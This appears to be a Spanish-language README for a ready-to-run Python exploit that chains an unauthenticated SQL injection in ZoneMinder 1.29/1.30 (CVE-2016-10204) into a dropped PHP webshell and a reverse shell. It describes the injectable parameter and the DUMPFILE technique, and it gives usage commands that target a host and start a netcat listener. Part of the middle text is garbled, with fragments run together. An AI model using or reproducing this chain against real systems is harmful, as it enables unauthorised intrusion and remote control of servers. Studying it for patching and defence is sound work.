
Inyección SQL no autenticada a exploit RCE para ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC en Python de SQLi a webshell a reverse shell con un solo comando.
Un exploit de Python listo para ejecutar para ZoneMinder 1.29/1.30 que encadena la inyección SQL no autenticada (CVE-2016-10204, EDB-41239) hasta llegar a una shell inversa interactiva.
Este es un PoC weaponizado/automatizado para un CVE conocido y parcheado, no un exploit nuevo.
El PoC de EDB para este bug se detiene en el payload de SQLi o en "apuntar sqlmap a él". Este exploit empaqueta la cadena completa de SQLi a webshell a shell en un solo script legible.
SLEEP) sobre el parámetro
POST limit de index.php?view=request&request=log&task=query.SELECT ... INTO DUMPFILE,
probando varias rutas comunes de ZoneMinder/Apache.bash hacia tu
listener de netcat.DUMPFILE, no OUTFILE. OUTFILE escapa los saltos de línea y destroza
el PHP multilínea; DUMPFILE escribe bytes sin procesar, por lo que la webshell permanece válida.# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT, ver LICENSE.